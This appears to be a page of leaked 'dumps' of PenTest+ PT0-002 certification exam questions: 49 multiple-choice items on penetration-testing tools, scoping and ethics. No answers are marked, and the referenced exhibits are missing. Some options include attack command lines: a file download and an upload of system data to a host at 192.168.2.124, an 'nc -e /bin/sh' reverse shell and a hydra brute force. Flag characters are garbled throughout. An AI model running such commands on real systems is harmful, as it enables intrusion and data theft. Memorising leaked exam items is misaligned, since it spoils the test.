Latest Updated PT0-002 CompTIA PenTest+ Certification Dumps

test2023-01-17T08:11:28+00:00

The CompTIA PenTest+ PT0-002 certification is a highly respected and sought-after credential in the field of penetration testing and vulnerability management. To help individuals prepare for the PT0-002 exam,The PT0-002 CompTIA PenTest+ Certification Dumps are an excellent resource for anyone looking to take the CompTIA PenTest+ certification exam.

By taking the PT0-002 CompTIA PenTest+ Certification Dumps, you will gain a deeper understanding of the exam material and be better prepared to pass the certification exam on your first try. By using the PT0-002 CompTIA PenTest+ Certification Dumps in conjunction with other study materials, you can give yourself the best chance of success on the actual certification exam.

Page 1 of 5

1. Which of the following situations would MOST likely warrant revalidation of a previous security assessment?

After detection of a breach

After a merger or an acquisition

When an organization updates its network firewall configurations

When most of the vulnerabilities have been remediated

2. A software development team is concerned that a new product's 64-bit Windows binaries can be deconstructed to the underlying code.

Which of the following tools can a penetration tester utilize to help the team gauge what an attacker might see in the binaries?

Immunity Debugger

OllyDbg

GDB

Drozer

3. A penetration tester conducted a vulnerability scan against a client’s critical servers and found the following:

Which of the following would be a recommendation for remediation?

Deploy a user training program

Implement a patch management plan

Utilize the secure software development life cycle

Configure access controls on each of the servers

4. A penetration tester conducts an Nmap scan against a target and receives the following results:

Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the target?

Nessus

ProxyChains

OWASPZAP

Empire

5. HOTSPOT

You are a security analyst tasked with hardening a web server.

You have been given a list of HTTP payloads that were flagged as malicious.

INSTRUCTIONS

Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

6. Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?

Unsupported operating systems

Susceptibility to DDoS attacks

Inability to network

The existence of default passwords

7. A private investigation firm is requesting a penetration test to determine the likelihood that attackers can gain access to mobile devices and then exfiltrate data from those devices.

Which of the following is a social-engineering method that, if successful, would MOST likely enable both objectives?

Send an SMS with a spoofed service number including a link to download a malicious application.

Exploit a vulnerability in the MDM and create a new account and device profile.

Perform vishing on the IT help desk to gather a list of approved device IMEIs for masquerading.

Infest a website that is often used by employees with malware targeted toward x86 architectures.

8. A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity.

Which of the following is the MOST important action to take before starting this type of assessment?

Ensure the client has signed the SO

Verify the client has granted network access to the hot site.

Determine if the failover environment relies on resources not owned by the client.

Establish communication and escalation procedures with the client.

9. A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions.

Which of the following commands would help the tester START this process?

certutil Curlcache Csplit Cf http://192.168.2.124/windows-binaries/ accesschk64.exe

powershell (New-Object System.Net.WebClient).UploadFile(‘http://192.168.2.124/ upload.php’, ‘systeminfo.txt’)

schtasks /query /fo LIST /v | find /I “Next Run Time:”

wget http://192.168.2.124/windows-binaries/accesschk64.exe CO accesschk64.exe

10. A penetration tester was able to gather MD5 hashes from a server and crack the hashes easily with rainbow tables.

Which of the following should be included as a recommendation in the remediation report?

Stronger algorithmic requirements

Access controls on the server

Encryption on the user passwords

A patch management program

Page 2 of 5

11. A penetration-testing team is conducting a physical penetration test to gain entry to a building.

Which of the following is the reason why the penetration testers should carry copies of the engagement documents with them?

As backup in case the original documents are lost

To guide them through the building entrances

To validate the billing information with the client

As proof in case they are discovered

12. After gaining access to a previous system, a penetration tester runs an Nmap scan against a network with the following results:

The tester then runs the following command from the previous exploited system, which fails:

Which of the following explains the reason why the command failed?

The tester input the incorrect IP address.

The command requires the -port 135 option.

An account for RDP does not exist on the server.

PowerShell requires administrative privilege.

13. A penetration tester found the following valid URL while doing a manual assessment of a web application: http://www.example.com/product.php?id=123987.

Which of the following automated tools would be best to use NEXT to try to identify a vulnerability in this URL?

SQLmap

Nessus

Nikto

DirBuster

14. A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important data.

Which of the following was captured by

the testing team?

Multiple handshakes

IP addresses

Encrypted file transfers

User hashes sent over SMB

15. A penetration tester utilized Nmap to scan host 64.13.134.52 and received the following

results:

Based on the output, which of the following services are MOST likely to be exploited? (Choose two.)

Telnet

HTTP

SMTP

DNS

NTP

SNMP

16. A penetration tester conducted a discovery scan that generated the following:

Which of the following commands generated the results above and will transform them into a list of active hosts for further analysis?

nmap CoG list.txt 192.168.0.1-254 , sort

nmap Csn 192.168.0.1-254 , grep “Nmap scan” | awk ‘{print S5}’

nmap C-open 192.168.0.1-254, uniq

nmap Co 192.168.0.1-254, cut Cf 2

17. A penetration tester wants to test a list of common passwords against the SSH daemon on a network device.

Which of the following tools would be BEST to use for this purpose?

Hashcat

Mimikatz

Patator

John the Ripper

18. A security firm has been hired to perform an external penetration test against a company. The only information the firm received was the company name.

Which of the following passive reconnaissance approaches would be MOST likely to yield positive initial results?

Specially craft and deploy phishing emails to key company leaders.

Run a vulnerability scan against the company's external website.

Runtime the company's vendor/supply chain.

Scrape web presences and social-networking sites.

19. A Chief Information Security Officer wants to evaluate the security of the company's e-commerce application.

Which of the following tools should a penetration tester use FIRST to obtain relevant information from the application without triggering alarms?

SQLmap

DirBuster

w3af

OWASP ZAP

20. A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot.

Which of the following techniques would BEST support this objective?

Create a one-shot system service to establish a reverse shell.

Obtain /etc/shadow and brute force the root password.

Run the nc -e /bin/sh <...> command.

Move laterally to create a user account on LDAP

Page 3 of 5

21. A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment.

Which of the following could be used for a denial-of-service attack on the network segment?

Smurf

Ping flood

Fraggle

Ping of death

22. An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems.

Which of the following is the penetration tester trying to accomplish?

Uncover potential criminal activity based on the evidence gathered.

Identity all the vulnerabilities in the environment.

Limit invasiveness based on scope.

Maintain confidentiality of the findings.

23. A penetration tester ran a ping CA command during an unknown environment test, and it returned a 128 TTL packet.

Which of the following OSs would MOST likely return a packet of this type?

Windows

Apple

Linux

Android

24. A penetration tester logs in as a user in the cloud environment of a company.

Which of the following Pacu modules will enable the tester to determine the level of access of the existing user?

iam_enum_permissions

iam_privesc_scan

iam_backdoor_assume_role

iam_bruteforce_permissions

25. DRAG DROP

During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.

INSTRUCTIONS

Analyze the code segments to determine which sections are needed to complete a port scanning script.

Drag the appropriate elements into the correct locations to complete the script.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

26. A penetration tester ran the following commands on a Windows server:

Which of the following should the tester do AFTER delivering the final report?

Delete the scheduled batch job.

Close the reverse shell connection.

Downgrade the svsaccount permissions.

Remove the tester-created credentials.

27. Deconfliction is necessary when the penetration test:

determines that proprietary information is being stored in cleartext.

occurs during the monthly vulnerability scanning.

uncovers indicators of prior compromise over the course of the assessment.

proceeds in parallel with a criminal digital forensic investigation.

28. A penetration tester is cleaning up and covering tracks at the conclusion of a penetration test.

Which of the following should the tester be sure to remove from the system? (Choose two.)

Spawned shells

Created user accounts

Server logs

Administrator accounts

Reboot system

ARP cache

29. A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal.

Some of the files that were discovered through this vulnerability are:

Which of the following is the BEST method to help an attacker gain internal access to the affected machine?

Edit the discovered file with one line of code for remote callback

Download .pl files and look for usernames and passwords

Edit the smb.conf file and upload it to the server

Download the smb.conf file and look at configurations

30. A client has requested that the penetration test scan include the following UDP services:

SNMP, NetBIOS, and DNS.

Which of the following Nmap commands will perform the scan?

nmap Cvv sUV Cp 53, 123-159 10.10.1.20/24 CoA udpscan

nmap Cvv sUV Cp 53,123,161-162 10.10.1.20/24 CoA udpscan

nmap Cvv sUV Cp 53,137-139,161-162 10.10.1.20/24 CoA udpscan

nmap Cvv sUV Cp 53, 122-123, 160-161 10.10.1.20/24 CoA udpscan

Page 4 of 5

31. A company becomes concerned when the security alarms are triggered during a penetration test.

Which of the following should the company do NEXT?

Halt the penetration test.

Contact law enforcement.

Deconflict with the penetration tester.

Assume the alert is from the penetration test.

32. A penetration tester wants to find hidden information in documents available on the web at a particular domain.

Which of the following should the penetration tester use?

Netcraft

CentralOps

Responder

FOCA

33. When planning a penetration-testing effort, clearly expressing the rules surrounding the optimal time of day for test execution is important because:

security compliance regulations or laws may be violated.

testing can make detecting actual APT more challenging.

testing adds to the workload of defensive cyber- and threat-hunting teams.

business and network operations may be impacted.

34. A security company has been contracted to perform a scoped insider-threat assessment to try to gain access to the human resources server that houses PII and salary data. The penetration testers have been given an internal network starting position.

Which of the following actions, if performed, would be ethical within the scope of the assessment?

Exploiting a configuration weakness in the SQL database

Intercepting outbound TLS traffic

Gaining access to hosts by injecting malware into the enterprise-wide update server

Leveraging a vulnerability on the internal CA to issue fraudulent client certificates

Establishing and maintaining persistence on the domain controller

35. A penetration tester has gained access to part of an internal network and wants to exploit on a different network segment. Using Scapy, the tester runs the following command:

Which of the following represents what the penetration tester is attempting to accomplish?

DNS cache poisoning

MAC spoofing

ARP poisoning

Double-tagging attack

36. A penetration tester is conducting a penetration test.

The tester obtains a root-level shell on a Linux server and discovers the following data in a file named password.txt in the /home/svsacct directory:

U3VQZXIkM2NyZXQhCg==

Which of the following commands should the tester use NEXT to decode the contents of the file?

echo U3VQZXIkM2NyZXQhCg== | base64 "d

tar zxvf password.txt

hydra "l svsacct "p U3VQZXIkM2NyZXQhCg== ssh://192.168.1.0/24

john --wordlist /usr/share/seclists/rockyou.txt password.txt

37. A company is concerned that its cloud VM is vulnerable to a cyberattack and proprietary data may be stolen. A penetration tester determines a vulnerability does exist and exploits the vulnerability by adding a fake VM instance to the IaaS component of the client's VM.

Which of the following cloud attacks did the penetration tester MOST likely implement?

Direct-to-origin

Cross-site scripting

Malware injection

Credential harvesting

38. A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday.

Which of the following should the security company have acquired BEFORE the start of the assessment?

A signed statement of work

The correct user accounts and associated passwords

The expected time frame of the assessment

The proper emergency contacts for the client

39. Which of the following situations would require a penetration tester to notify the emergency contact for the engagement?

The team exploits a critical server within the organization.

The team exfiltrates PII or credit card data from the organization.

The team loses access to the network remotely.

The team discovers another actor on a system on the network.

40. Which of the following tools provides Python classes for interacting with network protocols?

Responder

Impacket

Empire

PowerSploit

Page 5 of 5

41. A security firm is discussing the results of a penetration test with the client. Based on the findings, the client wants to focus the remaining time on a critical network segment.

Which of the following BEST describes the action taking place?

Maximizing the likelihood of finding vulnerabilities

Reprioritizing the goals/objectives

Eliminating the potential for false positives

Reducing the risk to the client environment

42. A penetration tester, who is doing an assessment, discovers an administrator has been exfiltrating proprietary company information. The administrator offers to pay the tester to keep quiet.

Which of the following is the BEST action for the tester to take?

Check the scoping document to determine if exfiltration is within scope.

Stop the penetration test.

Escalate the issue.

Include the discovery and interaction in the daily report.

43. A penetration tester is assessing a wireless network. Although monitoring the correct channel and SSID, the tester is unable to capture a handshake between the clients and the AP.

Which of the following attacks is the MOST effective to allow the penetration tester to capture a handshake?

Key reinstallation

Deauthentication

Evil twin

Replay

44. Which of the following should a penetration tester attack to gain control of the state in the HTTP protocol after the user is logged in?

HTTPS communication

Public and private keys

Password encryption

Sessions and cookies

45. A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP.

Which of the following steps should the tester take NEXT?

Send deauthentication frames to the stations.

Perform jamming on all 2.4GHz and 5GHz channels.

Set the malicious AP to broadcast within dynamic frequency selection channels.

Modify the malicious AP configuration to not use a pre-shared key.

46. A penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier.

Which of the following is the BEST action for the penetration tester to take?

Utilize the tunnel as a means of pivoting to other internal devices.

Disregard the IP range, as it is out of scope.

Stop the assessment and inform the emergency contact.

Scan the IP range for additional systems to exploit.

47. A company uses a cloud provider with shared network bandwidth to host a web application on dedicated servers. The company's contact with the cloud provider prevents any activities that would interfere with the cloud provider's other customers.

When engaging with a penetration-testing company to test the application, which of the following should the company avoid?

Crawling the web application's URLs looking for vulnerabilities

Fingerprinting all the IP addresses of the application's servers

Brute forcing the application's passwords

Sending many web requests per second to test DDoS protection

48. A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running.

Which of the following would BEST support this task?

Run nmap with the Co, -p22, and CsC options set against the target

Run nmap with the CsV and Cp22 options set against the target

Run nmap with the --script vulners option set against the target

Run nmap with the CsA option set against the target

49. A penetration tester is able to capture the NTLM challenge-response traffic between a client and a server.

Which of the following can be done with the pcap to gain access to the server?

Perform vertical privilege escalation.

Replay the captured traffic to the server to recreate the session.

Use John the Ripper to crack the password.

Utilize a pass-the-hash attack.